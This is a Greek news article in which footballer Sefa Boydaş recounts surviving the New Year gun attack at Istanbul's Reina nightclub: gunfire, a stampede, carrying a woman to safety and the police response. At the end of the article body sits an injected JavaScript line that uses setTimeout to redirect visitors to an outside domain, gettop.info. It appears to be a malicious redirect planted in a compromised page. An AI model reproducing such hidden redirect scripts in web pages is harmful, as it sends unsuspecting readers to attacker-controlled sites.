Σοκαριστική η περιγραφή ποδοσφαιριστή-αυτόπτη μάρτυρα στο μακελειό της Πόλης

0
14

 

Αν και δεν ήθελε να πάει στη διάσημη ντισκοτέκ της Κωνσταντινούπολης Reina, ο επαγγελματίας ποδοσφαιριστής Σεφά Μποϊντάς στη μικρή ομάδα Μπεϊλερμπέγι, βρέθηκε να τρέχει να γλυτώσει από τα πυρά του φονικού «Άη Βασίλη».

Όπως αποκάλυψε ο Μποϊντάς δεν ήθελε να πάει καθώς φοβόταν επίθεση από βόμβα ή κάποια συμπλοκή καθώς η Πόλη είχε γίνει στόχος τρομοκρατικών επιθέσεων σε όλη τη διάρκεια του 2016, ιδίως κεντρικά τουριστικά σημεία. Ένας φίλος του τον έπεισε να πάει και μάλιστα έφθασε δέκα λεπτά πριν από την επίθεση. «Είχα ένα προαίσθημα… Πήγα εκεί αργά, μετά την αλλαγή του χρόνου. Και όλο αυτό συνέβη 10 λεπτά αφότου είχα φθάσει» σημειώνει.

«Ακριβώς τη στιγμή που ετοιμαζόμουν να καθίσω κοντά στην είσοδο, σηκώθηκε πολλή σκόνη και καπνός. Πυροβολισμοί ξέσπασαν. Υπάρχουν πιθανόν περισσότερα θύματα, επειδή καθώς προχωρούσα, άνθρωποι ποδοπατούσαν άλλους ανθρώπους», περιγράφει ο ποδοσφαιριστής μιλώντας στο Γαλλικό Πρακτορείο, ο οποίος είχε πάει στη Reina μαζί με δύο φίλες του.

Μόλις άρχισαν οι πυροβολισμοί ακολούθησαν σκηνές αλλοφροσύνης. «Ακούγοντας τους θορύβους αυτούς, πολλές γυναίκες λιποθύμησαν. Τη σήκωσα στην πλάτη μου και βάλθηκα αμέσως να τρέχω».

«Δεν ξέρω πώς κατάφερα να διαφύγω. Σε τέτοιες στιγμές, δεν περιμένεις. Ακούγαμε πυροβολισμούς αριστερά, έτσι τρέξαμε προς τα δεξιά. Περίπου 50 άτομα διέφυγαν πιθανόν μ’ αυτόν τον τρόπο» συμπλήρωσε.

Όσο για την αντίδραση της αστυνομίας αναφέρει: «Έφθασαν πολύ γρήγορα, αλλά δεν κατάφεραν να ελέγξουν αμέσως την κατάσταση, δεν ήξεραν ποιος ήταν ο δράστης. Μας υποψιάζονταν όλους». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here